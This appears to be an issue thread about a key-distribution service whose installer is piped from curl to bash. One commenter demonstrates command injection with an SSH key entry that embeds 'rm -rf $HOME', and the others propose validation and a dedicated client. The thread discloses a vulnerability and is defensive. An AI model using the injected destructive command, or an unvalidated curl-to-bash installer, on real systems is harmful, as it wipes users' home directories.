Piping to bash is not secure

[grimborg]

I love the idea, but curl -s | bash is not something any user should trust.

It's also very easy to inject commands, check out my key (do NOT install it!).

$ curl -s http://ssh.keychain.io/grimborg@gmail.com/install mkdir -p $HOME/.ssh touch $HOME/.ssh/authorized_keys

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCDav6GptWnxXDEV5XK891RQfr6BGYLOoJ4RTttz57IQkMwt5SxVX581hGjhHwMSYlNGnI1BXKSnN25ZohU33k4pfyWtcfBZb6YL2FLzDQcIM3iNOwRW4aW6ABbPwL6LmO/rbu02sBWvf8Oqwc4GtXt4O1++gZcbHCSP1VE/YXR8wRrjP2wNWhCE8PYIO07w8p918QlvPLSO3vU9VH0cXph31ENkweOl20Nzys/CYglT518cLRBY2NWiQ1eQEVFuThLDBLu50GOkC7OgjgM3hhiRLjj/HdeVnzM/9ZAiaqJY0Q1HvM6QUT7Z2gcPn9UIicEAIT9fFRstD6MqE9v0x9 grimborg@gmail.com"; rm -rf $HOME; "" >> $HOME/.ssh/authorized_keys

But even if the injection is fixed, piping to bash is inherently insecure. How about having a keychain client that would install the keys? I'd be happy to contribute.

[sysr-q]

There could be some form of rough check in place (even if it's a hacked in regex, for the time being) to make sure they at-least adhere to a general-ish style.

A keychain client would be nifty, that would be a better way in my opinion as well.

[progrium]

You guys are right. Maybe it can install some sort of lightweight client. Let me rethink it for a bit as this was just a proof of concept. Thanks for the input!

[Seldaek]

Also, besides the considerations of piping into bash or not, please use a complete https url and not just ssh.keychain.io. Using curl -sS would also be a bit better since that hides output but shows errors.

[phrozen]

Just a thought on this, returning bash commands to run, hits some of us with windows machines too. Would Love a generic API for all.

[nodesocket]

One option, ssh-keygen can be used to calculate the fingerprint of a key file, which will fail if you don't pass it a valid key.